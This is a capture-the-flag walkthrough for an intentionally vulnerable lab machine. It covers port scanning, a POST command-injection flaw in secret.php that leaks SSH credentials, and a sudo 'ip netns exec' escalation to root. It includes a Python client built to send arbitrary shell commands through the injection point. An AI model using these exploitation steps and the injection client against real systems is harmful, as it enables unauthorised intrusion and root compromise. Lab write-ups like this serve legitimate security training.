Information gathering

Host scan

arp-scan -l

Port scan

┌──(root㉿kali)-[~]
└─# nmap -sV -p-   192.168.239.198
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-15 11:00 EDT
Nmap scan report for 192.168.239.198
Host is up (0.00032s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
MAC Address: 08:00:27:57:7A:C6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Directory scan

[11:01:32] Starting:
[11:02:01] 200 -  344B  - /index.htm
[11:02:18] 200 -  285B  - /sitemap.xml

The hint mentions a parameter, so open the page and see what it is.

The page source reveals a path, /secret.php, together with a GET parameter, HackMyVM (the name is case-sensitive on the PHP side). Requesting it directly with the parameter in the query string only returns an error message:

┌──(root㉿kali)-[~]
└─# curl http://192.168.239.198/secret.php?HackMyVM
Now the main part what it is loooooool<br>Try other method   

So the next thing to try is passing the same parameter via POST.

-d supplies the request body; curl sends it form-encoded (application/x-www-form-urlencoded), which is exactly what PHP reads into $_POST. With -d present, -X POST is redundant but harmless.

Reading secret.php through the injection point shows the command-execution sink itself (system() on the raw POST value, no filtering) and, at the bottom, a username and password:

┌──(root㉿kali)-[~]
└─# curl -X POST 'http://192.168.239.198/secret.php' -d 'HackMyVM=cat secret.php'
You Found ME : - (<pre><?php
if(isset($_GET['HackMyVM'])){
        echo "Now the main part what it is loooooool";
        echo "<br>";
echo "Try other method";
        die;
}
if(isset($_POST['HackMyVM'])){
        echo "You Found ME : - (";
        echo "<pre>";
        $cmd = ($_POST['HackMyVM']);
        system($cmd);
        echo "</pre>";
        die;
}
else {
header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg");
}
$ok="prakasaka:th3-!llum!n@t0r";
?>
</pre>                                                                                                                                                          
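The following is an added example, not code from the original writeup: a small stdlib-only Python client for the secret.php endpoint that exercises all three branches of the PHP shown above. Two details from the source drive the design. First, the else branch answers a parameter-less request with a redirect to an external image, so a browser would silently fetch the picture; the client refuses to follow 3xx responses and reports the Location header instead (the same reason plain curl, which does not follow redirects without -L, was convenient in the writeup). Second, system() output is wrapped in <pre>...</pre> but is not HTML-escaped, so when the command output itself contains </pre> (as it does when reading secret.php), a naive non-greedy regex truncates the result; the parser takes the outermost pair instead. The target URL and parameter name are taken from the writeup and are assumed, not verified here; the sample response body is condensed from the curl output above and is used only for the offline self-check.

```python
#!/usr/bin/env python3
"""Client for the secret.php command-injection point (added example).

Assumed from the writeup: target http://192.168.239.198/secret.php,
POST parameter HackMyVM. Nothing here is verified against a live host.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

TARGET = "http://192.168.239.198/secret.php"  # target from the writeup
# PHP array keys are case-sensitive: "hackmyvm" would miss both isset() checks.
PARAM = "HackMyVM"

# Condensed from the writeup's curl output. The echoed source contains its own
# '</pre>' inside an echo statement, which is the edge case extract_output() handles.
SAMPLE_POST_BODY = (
    "You Found ME : - (<pre><?php\n"
    "if(isset($_POST['HackMyVM'])){\n"
    '        echo "<pre>";\n'
    "        $cmd = ($_POST['HackMyVM']);\n"
    "        system($cmd);\n"
    '        echo "</pre>";\n'
    "}\n"
    '$ok="prakasaka:th3-!llum!n@t0r";\n'
    "?>\n"
    "</pre>"
)


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse every 3xx so urllib raises HTTPError and we keep the Location header."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


OPENER = urllib.request.build_opener(NoRedirect)


def request(url, data=None, timeout=10):
    """GET (data is None) or POST form data; return (status, headers, body), never following redirects."""
    req = urllib.request.Request(url, data=data, method="POST" if data is not None else "GET")
    try:
        with OPENER.open(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers), resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:  # 3xx (because of NoRedirect), 4xx and 5xx land here
        return err.code, dict(err.headers), err.read().decode(errors="replace")


def header(headers, name):
    """Case-insensitive header lookup; servers may send 'location' or 'Location'."""
    return next((v for k, v in headers.items() if k.lower() == name.lower()), None)


def extract_output(body):
    """Return the text between the first '<pre>' and the LAST '</pre>', or None if there is no '<pre>'.

    system() output is not escaped, so it may contain '</pre>' itself; a
    non-greedy regex would stop at that inner tag and truncate the result.
    """
    _, tag, rest = body.partition("<pre>")
    if not tag:
        return None
    out, tag, _ = rest.rpartition("</pre>")
    if not tag:
        out = rest  # no closing tag at all; keep whatever came back
    return out.strip()


def classify(status, headers, body):
    """Label which branch of secret.php answered.

    ("redirect", location)  - no parameter sent, else branch
    ("get-branch", None)    - parameter sent via GET, decoy message
    ("post-branch", output) - parameter sent via POST, system() ran
    ("unknown", body)       - anything else
    Note the PHP tests $_GET first, so a POST to secret.php?HackMyVM=... still hits the decoy.
    """
    if 300 <= status < 400:
        return "redirect", header(headers, "Location")
    if "Try other method" in body:
        return "get-branch", None
    out = extract_output(body)
    if out is not None:
        return "post-branch", out
    return "unknown", body


def run_cmd(cmd, target=TARGET):
    """Send one shell command through the POST sink and return classify()'s result."""
    data = urllib.parse.urlencode({PARAM: cmd}).encode()
    return classify(*request(target, data))


if __name__ == "__main__":
    cmd = sys.argv[1] if len(sys.argv) > 1 else "id"
    print("no parameter:", classify(*request(TARGET)))
    print("GET decoy   :", classify(*request(TARGET + "?" + PARAM)))
    label, detail = run_cmd(cmd)
    print(f"POST {cmd!r}:", label)
    if label == "post-branch":
        print(detail)
```

Usage: `python3 secret_client.py 'cat secret.php'` prints the redirect target for the bare request, the decoy label for the GET probe, and the full command output (including the inner `</pre>` line) for the POST. Swap the hard-coded TARGET if the lab address differs.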

Getting a shell

Log in over SSH with the credentials leaked in secret.php (prakasaka / th3-!llum!n@t0r):

prakasaka@method:~$ cat uSeR.txt 
e4408105ca9c2a5c*************

Privilege escalation

Run sudo -l. The (!root) NOPASSWD entry for /bin/bash explicitly excludes root and is a distraction; the useful entry is (root) /bin/ip, which does require the password we already have:

prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User prakasaka may run the following commands on method:
    (!root) NOPASSWD: /bin/bash
    (root) /bin/ip

Look up ip on GTFOBins (gtfobins.github.io): ip netns exec runs an arbitrary program inside a fresh network namespace, and under sudo that program runs as root.

prakasaka@method:~$ sudo ip netns add foo
prakasaka@method:~$ sudo ip netns exec foo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cat rOot.txt
fc9c6eb6265921315***********

Key takeaways

  1. Information gathering from the web page source (the hidden path and parameter name were only visible there).
  2. GET versus POST: the same parameter name can be handled by different code paths, so a GET decoy says nothing about what POST does.
  3. Using curl for probing: it does not follow redirects unless told to, so the parameter-less redirect to an external image is visible instead of silently fetched as in a browser.